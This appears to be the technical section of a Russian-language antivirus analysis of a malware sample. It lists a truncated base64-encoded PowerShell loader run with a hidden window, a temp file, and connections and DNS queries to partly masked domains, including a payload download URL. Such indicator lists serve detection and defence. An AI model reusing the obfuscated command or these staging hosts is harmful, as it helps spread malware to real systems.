Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHYAaAAyADUAeAB2AD0AKAAoACcAQQAnACsAJwB5ADgAbgBzACcAKQArACcAMABzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1394430.cvr
- 'wu##ish.com':80
- 'en###jia.com':80
- 'ae##c.com':443
- http://en###jia.com/oxl/k/
- DNS ASK wu##ish.com
- DNS ASK en###jia.com
- DNS ASK ha####yimpex.com
- DNS ASK ae##c.com
- DNS ASK bl##.#888168.xyz
- DNS ASK in#######ts.azurewebsites.net
- DNS ASK la###inaja.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHYAaAAyADUAeAB2AD0AKAAoACcAQQAnACsAJwB5ADgAbgBzACcAKQArACcAMABzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVABFAE0AcABcAFcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)